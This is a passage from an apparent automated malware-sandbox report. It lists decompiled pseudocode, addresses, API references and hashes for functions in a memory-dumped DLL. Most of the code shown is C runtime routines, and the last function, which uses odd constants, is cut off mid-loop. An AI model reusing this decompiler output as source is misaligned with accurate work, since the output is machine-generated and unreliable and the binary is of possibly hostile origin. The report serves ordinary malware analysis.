Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 980be91b5521d63f7622da9dd32fb0b3ec8bab83566713bf4c411f1a318c42ba
Instruction ID: 92e4df630345e63b1691b6499e202068a405d19f958651a0f2a8a9c7750779bd
Opcode Fuzzy Hash: 980be91b5521d63f7622da9dd32fb0b3ec8bab83566713bf4c411f1a318c42ba
Instruction Fuzzy Hash: C841C13AB412049FCB10CF78C881E69B7B5FF85714B268169E555EB341D731ED02CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD683, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6D4CD683(void* __ecx, void* __edx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6d5451e4; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E6D4CC7EF(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E6D4D4196(_t13, __eflags,  *0x6d5451e4, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E6D4CD33F(_t13, _t16, 0x6d5476f0);
							E6D4CCBD3(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6D4CCBD3();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E6D4D4140(_t11, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x6d4cd683
0x6d4cd68e
0x6d4cd690
0x6d4cd692
0x6d4cd697
0x6d4cd69a
0x6d4cd6a8
0x6d4cd6b4
0x6d4cd6b7
0x6d4cd6ba
0x6d4cd6cc
0x6d4cd6d1
0x6d4cd6d3
0x6d4cd6de
0x6d4cd6e4
0x6d4cd6ec
0x6d4cd6ee
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4cd6d5
0x6d4cd6d5
0x00000000
0x6d4cd6d5
0x6d4cd6bc
0x6d4cd6bc
0x6d4cd6bd
0x6d4cd6bd
0x6d4cd6f0
0x6d4cd6f1
0x6d4cd6f1
0x6d4cd69c
0x6d4cd6a2
0x6d4cd6a6
0x6d4cd6f9
0x6d4cd6fa
0x6d4cd700
0x00000000
0x00000000
0x00000000
0x6d4cd6a6
0x6d4cd707

APIs

GetLastError.KERNEL32(6D4875D9,6D4875D9,00000002,6D4C2286,6D4CF2B0,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004), ref: 6D4CD688
_free.LIBCMT ref: 6D4CD6BD
_free.LIBCMT ref: 6D4CD6E4
SetLastError.KERNEL32(00000000,?,6D4875D9), ref: 6D4CD6F1
SetLastError.KERNEL32(00000000,?,6D4875D9), ref: 6D4CD6FA

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 337f654264332b177575ede8ec0a5643c916af3c6dc305ef2ef17e92da2ab3a6
Instruction ID: 94681b435a52e262c44d0d30fc86789efb4e5cfecb520baf8f87450fb6a76608
Opcode Fuzzy Hash: 337f654264332b177575ede8ec0a5643c916af3c6dc305ef2ef17e92da2ab3a6
Instruction Fuzzy Hash: 9901A93E3C950277C602A7655C89F6B667A9FD33757264129F51DD2242EF70CC0281A7

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DCCC3, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4DCCC3(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6d5450b8; // 0x6d5450b0
					if(_t23 != 0) {
						E6D4CCBD3(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6d5450bc; // 0x6d547248
					if(_t24 != 0) {
						E6D4CCBD3(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6d5450c0; // 0x6d547248
					if(_t25 != 0) {
						E6D4CCBD3(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6d5450e8; // 0x6d5450b4
					if(_t26 != 0) {
						E6D4CCBD3(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6d5450ec; // 0x6d54724c
					if(_t27 != 0) {
						return E6D4CCBD3(_t6);
					}
				}
				return _t6;
			}

0x6d4dccc9
0x6d4dccce
0x6d4dccd2
0x6d4dccd8
0x6d4dccdb
0x6d4dcce0
0x6d4dcce4
0x6d4dccea
0x6d4dcced
0x6d4dccf2
0x6d4dccf6
0x6d4dccfc
0x6d4dccff
0x6d4dcd04
0x6d4dcd08
0x6d4dcd0e
0x6d4dcd11
0x6d4dcd16
0x6d4dcd17
0x6d4dcd1a
0x6d4dcd20
0x00000000
0x6d4dcd28
0x6d4dcd20
0x6d4dcd2b

APIs

_free.LIBCMT ref: 6D4DCCDB

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4DCCED
_free.LIBCMT ref: 6D4DCCFF
_free.LIBCMT ref: 6D4DCD11
_free.LIBCMT ref: 6D4DCD23

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 925f8a090491a61dd12502a7d0d53b0bec77ac97227391e03917ada3cfecffcb
Instruction ID: dbea0220b2fb5b7166f342ea7973593ef5a2c13fb16ba282f2e4b9bbba46459e
Opcode Fuzzy Hash: 925f8a090491a61dd12502a7d0d53b0bec77ac97227391e03917ada3cfecffcb
Instruction Fuzzy Hash: 28F049395082059BCA50EB99F8C4D2B77FBAE097117724C09E129D7A09DB30FC808AE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C7D8A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6D4C7D8A(void* __ebx, signed int __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				void* _v64;
				void* __esi;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				signed short* _t178;
				intOrPtr* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int** _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;

				_t149 = __ecx;
				_t86 =  *0x6d54506c; // 0xff2bc58a
				_v8 = _t86 ^ _t184;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t181 = _a20;
				_v32 = _t181;
				_t91 = _a8;
				if(_t91 == 0) {
					_t178 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t178 =  *(_t143 + 0x158);
					} else {
						_t178 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t191 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E6D4D41EF(0, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t178, 0, 0, 0);
					} else {
						_t129 = E6D4D43E3(0, _t191,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t178, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t181 = 0;
							__eflags = 0;
							L18:
							_v28 = _t181;
							if(_t181 == 0) {
								L30:
								E6D48DEE1(0);
								_t181 = _v32;
								while(1) {
									L113:
									_t172 =  *_t178 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t181;
									if( *_t181 == 0) {
										L28:
										L29:
										return E6D49F8A5(_v8 ^ _t184, _t172, _t181);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t178;
									_t144 = _t178;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t98 = E6D4C7154(_t145, _t153, _t178, _v52, _t97, _v48, _v40, _t181, _t145, _v32);
												_t185 = _t185 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E6D4C2281())) = 0x16;
													goto L29;
												}
												L112:
												_t178 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t178 =  &(_t178[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t181 =  *_t181 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t181;
													if( *_t181 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t181 =  *_t181 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t181;
												if( *_t181 <= 0) {
													goto L91;
												}
												_t179 = _v40;
												 *((short*)( *_t179)) =  *_t173;
												 *_t179 =  *_t179 + 2;
												 *_t181 =  *_t181 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t178 =  &(_t178[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t178 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t181;
												if( *_t181 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t178 =  &(_t178[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t181 =  *_t181 - 1;
												_t159 =  *_t178 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E6D4D806D(_t145, _t178, _t181, _t178, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E6D4D806D(_t145, _t178, _t181, _t178, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t178[3]);
											}
										} else {
											_t153 =  &(_t178[5]);
											_v28 =  &(_t178[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t200 = _v33;
							if(_v33 == 0) {
								_t133 = E6D4D41EF(_t165, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t178, _t181, _t147, 0);
							} else {
								_t133 = E6D4D43E3(_t165, _t200,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t178, _t181, _t147);
							}
							_t180 = _t181;
							_t172 = _t133 - 1;
							if(_t172 <= 0) {
								L27:
								E6D48DEE1(_t181);
								goto L28;
							} else {
								_t148 = _v32;
								_t182 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t180;
									_t180 =  &(_t180[0]);
									 *( *_t182) = _t135;
									 *_t182 =  &(( *_t182)[0]);
									 *_t148 =  *_t148 - 1;
									_t172 = _t172 - 1;
									if(_t172 > 0) {
										continue;
									}
									break;
								}
								_t181 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t183 = E6D4CF26D(_t165, _t137 & _t165);
							_v28 = _t183;
							_pop(_t165);
							__eflags = _t183;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t183 = 0xdddd;
							L14:
							_t181 = _t183 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E6D4A01B0();
						_t183 = _t185;
						_v28 = _t183;
						if(_t183 == 0) {
							goto L30;
						}
						 *_t183 = 0xcccc;
						goto L14;
					}
				}
			}

0x6d4c7d8a
0x6d4c7d92
0x6d4c7d99
0x6d4c7d9f
0x6d4c7da2
0x6d4c7da9
0x6d4c7dac
0x6d4c7db2
0x6d4c7db5
0x6d4c7db9
0x6d4c7dbc
0x6d4c7dc0
0x6d4c7dc3
0x6d4c7dda
0x6d4c7dc5
0x6d4c7dc8
0x6d4c7dd2
0x6d4c7dca
0x6d4c7dca
0x6d4c7dca
0x6d4c7dc8
0x6d4c7de7
0x00000000
0x6d4c7ded
0x6d4c7df6
0x6d4c7dfd
0x6d4c7e07
0x6d4c7e0a
0x6d4c7e12
0x6d4c7e1a
0x6d4c7e22
0x6d4c7e29
0x6d4c7e2f
0x6d4c7e36
0x6d4c7e38
0x6d4c7e4e
0x6d4c7e5c
0x6d4c7e3a
0x6d4c7e47
0x6d4c7e47
0x6d4c7e61
0x6d4c7e65
0x00000000
0x6d4c7e6b
0x6d4c7e6b
0x6d4c7e6e
0x6d4c7e73
0x6d4c7e77
0x6d4c7ed1
0x6d4c7ed1
0x6d4c7ed3
0x6d4c7ed3
0x6d4c7ed8
0x6d4c7f58
0x6d4c7f5a
0x6d4c7f5f
0x6d4c81d6
0x6d4c81d6
0x6d4c81d6
0x6d4c81d9
0x6d4c81dc
0x00000000
0x00000000
0x6d4c7f68
0x6d4c7f6b
0x6d4c7f42
0x6d4c7f44
0x6d4c7f57
0x6d4c7f57
0x6d4c7f6d
0x6d4c7f71
0x6d4c7f71
0x6d4c7f73
0x6d4c7f76
0x6d4c7f78
0x6d4c7f7b
0x6d4c7f7b
0x6d4c7f7e
0x6d4c7f7f
0x6d4c7f7f
0x6d4c7f84
0x6d4c7f87
0x6d4c7f8a
0x6d4c7f8d
0x6d4c7f90
0x6d4c80c5
0x6d4c80c5
0x6d4c80c8
0x6d4c8195
0x6d4c8195
0x6d4c8198
0x6d4c81b1
0x6d4c81b5
0x6d4c81b5
0x6d4c81b7
0x6d4c81b7
0x6d4c81c7
0x6d4c81cc
0x6d4c81cf
0x6d4c81d1
0x6d4c81ec
0x00000000
0x6d4c81f2
0x6d4c81d3
0x6d4c81d3
0x00000000
0x6d4c81d3
0x6d4c819a
0x6d4c819a
0x6d4c819d
0x00000000
0x00000000
0x6d4c819f
0x6d4c819f
0x6d4c81a2
0x6d4c81a7
0x6d4c81aa
0x6d4c81ad
0x00000000
0x6d4c81ad
0x6d4c80ce
0x6d4c80ce
0x6d4c80d1
0x6d4c8181
0x6d4c8181
0x6d4c8184
0x6d4c818d
0x6d4c8191
0x6d4c8191
0x00000000
0x6d4c8191
0x6d4c8186
0x6d4c8186
0x6d4c8189
0x00000000
0x00000000
0x00000000
0x6d4c818b
0x6d4c80d7
0x6d4c80d7
0x6d4c80da
0x6d4c816d
0x6d4c816d
0x6d4c8170
0x6d4c8179
0x6d4c817d
0x6d4c817d
0x00000000
0x6d4c817d
0x6d4c8172
0x6d4c8172
0x6d4c8175
0x00000000
0x00000000
0x00000000
0x6d4c8177
0x6d4c80e0
0x6d4c80e0
0x6d4c80e3
0x6d4c810c
0x6d4c810f
0x6d4c8113
0x6d4c811d
0x6d4c8115
0x6d4c8115
0x6d4c8115
0x6d4c8123
0x6d4c8126
0x6d4c8142
0x6d4c8142
0x6d4c8145
0x6d4c8148
0x00000000
0x00000000
0x6d4c814e
0x6d4c8151
0x6d4c8151
0x6d4c8154
0x00000000
0x00000000
0x6d4c8158
0x6d4c815b
0x6d4c815e
0x6d4c8161
0x6d4c8163
0x6d4c8166
0x6d4c8169
0x00000000
0x00000000
0x00000000
0x6d4c816b
0x6d4c8128
0x6d4c8128
0x6d4c812b
0x00000000
0x00000000
0x6d4c812d
0x6d4c8135
0x6d4c8138
0x6d4c813b
0x6d4c813b
0x00000000
0x6d4c8126
0x6d4c80e5
0x6d4c80e8
0x00000000
0x00000000
0x6d4c80ef
0x6d4c80ef
0x6d4c80f2
0x6d4c8105
0x00000000
0x6d4c8105
0x6d4c80f5
0x6d4c80f5
0x6d4c80f8
0x00000000
0x00000000
0x6d4c80fe
0x00000000
0x6d4c80fe
0x6d4c7f96
0x6d4c8094
0x6d4c8094
0x6d4c8097
0x6d4c80ba
0x6d4c80be
0x6d4c80be
0x00000000
0x6d4c80be
0x6d4c8099
0x6d4c8099
0x6d4c809c
0x00000000
0x00000000
0x6d4c809e
0x6d4c809e
0x6d4c80a1
0x6d4c80b3
0x00000000
0x6d4c80b3
0x6d4c80a3
0x6d4c80a3
0x6d4c80a6
0x00000000
0x00000000
0x6d4c80ac
0x00000000
0x6d4c80ac
0x6d4c7f9c
0x6d4c7f9f
0x6d4c8041
0x6d4c8041
0x6d4c8046
0x6d4c804c
0x6d4c804c
0x6d4c804d
0x6d4c8050
0x6d4c8056
0x6d4c8059
0x6d4c805c
0x00000000
0x00000000
0x6d4c8062
0x6d4c8065
0x6d4c8065
0x6d4c8068
0x00000000
0x00000000
0x6d4c8070
0x6d4c8071
0x6d4c8074
0x6d4c8077
0x00000000
0x00000000
0x6d4c807f
0x6d4c8082
0x6d4c8085
0x6d4c8087
0x6d4c808a
0x6d4c808d
0x00000000
0x00000000
0x00000000
0x6d4c808f
0x6d4c8065
0x00000000
0x6d4c8050
0x6d4c7fa5
0x6d4c7fa8
0x6d4c7fbd
0x6d4c7fc3
0x6d4c7fca
0x6d4c7fcc
0x6d4c8027
0x6d4c802d
0x6d4c802e
0x6d4c8030
0x6d4c8035
0x6d4c8035
0x6d4c7fce
0x6d4c7fce
0x6d4c7fd1
0x6d4c7fd1
0x6d4c8038
0x00000000
0x6d4c8038
0x6d4c7faa
0x6d4c7fad
0x6d4c8007
0x6d4c8007
0x6d4c800a
0x6d4c8016
0x6d4c801a
0x6d4c801a
0x00000000
0x6d4c801a
0x6d4c800c
0x6d4c800c
0x6d4c800f
0x00000000
0x00000000
0x00000000
0x6d4c8011
0x6d4c7faf
0x6d4c7fb2
0x6d4c7fd6
0x6d4c7fd6
0x6d4c7fd9
0x6d4c7ffc
0x6d4c8000
0x6d4c8000
0x00000000
0x6d4c8000
0x6d4c7fdb
0x6d4c7fdb
0x6d4c7fde
0x00000000
0x00000000
0x6d4c7fe0
0x6d4c7fe0
0x6d4c7fe3
0x6d4c7ff5
0x00000000
0x6d4c7ff5
0x6d4c7fe5
0x6d4c7fe5
0x6d4c7fe8
0x00000000
0x00000000
0x6d4c7fee
0x00000000
0x6d4c7fee
0x6d4c7fb4
0x6d4c7fb7
0x00000000
0x00000000
0x00000000
0x6d4c7fb7
0x00000000
0x6d4c81e2
0x6d4c7eda
0x6d4c7ee1
0x6d4c7f0a
0x6d4c7ee3
0x6d4c7ef2
0x6d4c7ef2
0x6d4c7f11
0x6d4c7f13
0x6d4c7f16
0x6d4c7f3b
0x6d4c7f3c
0x00000000
0x6d4c7f18
0x6d4c7f18
0x6d4c7f1b
0x6d4c7f1e
0x6d4c7f25
0x6d4c7f28
0x6d4c7f2b
0x6d4c7f2e
0x6d4c7f31
0x6d4c7f33
0x6d4c7f36
0x00000000
0x00000000
0x00000000
0x6d4c7f36
0x6d4c7f38
0x00000000
0x6d4c7f38
0x6d4c7f16
0x6d4c7e7e
0x6d4c7e80
0x6d4c7e82
0x6d4c7e8a
0x6d4c7eaf
0x6d4c7eb1
0x6d4c7ebb
0x6d4c7ebd
0x6d4c7ec0
0x6d4c7ec1
0x6d4c7ec3
0x00000000
0x00000000
0x6d4c7ec9
0x6d4c7eaa
0x6d4c7eaa
0x00000000
0x6d4c7eaa
0x6d4c7e8e
0x6d4c7e92
0x6d4c7e97
0x6d4c7e99
0x6d4c7e9e
0x00000000
0x00000000
0x6d4c7ea4
0x00000000
0x6d4c7ea4
0x6d4c7e65

APIs

__freea.LIBCMT ref: 6D4C7F3C
__freea.LIBCMT ref: 6D4C7F5A

Strings

a/p, xrefs: 6D4C8021
am/pm, xrefs: 6D4C7FBD

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: d4e9a7a2e5f21387cdeb1efd19f71a4353e13a5dfb71c93a75aaa0e8fcb0f4b3
Instruction ID: e50e0fbe26b4272616e04648563d4ceec8ecd4bf1967399f6ea10f3f33151f45
Opcode Fuzzy Hash: d4e9a7a2e5f21387cdeb1efd19f71a4353e13a5dfb71c93a75aaa0e8fcb0f4b3
Instruction Fuzzy Hash: 4BD1F1399582079BDB068F68C891FBAB7B0FF46300F25815AE914AB344DB359D81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D47F218, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 215
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6D47F218(signed int __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				signed char _v24;
				signed int _t36;
				signed short _t38;
				void* _t46;
				intOrPtr _t47;
				signed int _t53;
				signed short _t61;
				signed char _t71;
				signed int _t74;
				signed char _t82;
				signed char _t85;
				signed short _t89;
				signed int _t98;
				void* _t100;
				signed int _t104;
				intOrPtr _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;
				signed char _t112;
				signed int _t118;
				signed int _t119;
				signed int _t124;
				signed int _t130;
				signed int _t131;
				signed char _t135;
				signed int _t136;
				signed char _t137;
				signed int _t139;
				void* _t140;
				signed short* _t141;
				signed short* _t144;
				signed short _t146;
				void* _t151;
				void* _t154;
				void* _t156;
				void* _t157;

				_t36 =  *0x6d5459e6 & 0x0000ffff;
				_v12 = __edx;
				asm("cdq");
				_t104 = __edx;
				_v20 = 0xf;
				_t130 =  *0x6d5459d8; // 0x914ee6d4
				_t144 = 0x6d5459e6;
				_t139 =  *0x6d545a00; // 0x13aeb46e
				_v24 = _t36;
				_v16 = __edx;
				do {
					if(_t130 != _t36) {
						L3:
						_t5 = _t130 + 5; // 0x914ee6d9
						_t139 = _t139 * ( *_t144 & 0x0000ffff);
						_t38 =  *0x6d5459f0; // 0x99320090
						_t106 = _t5 + _t139;
						 *0x6d545a90 = _t106;
						if(_t106 != (_t38 & 0x0000ffff)) {
							_t36 = _v24;
							_t104 = _v16;
							goto L5;
						}
					} else {
						_t151 =  *0x6d5459dc - _t104; // 0x3
						if(_t151 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
					break;
					L5:
					_t144 =  &(_t144[1]);
				} while (_t144 < 0x6d545a44);
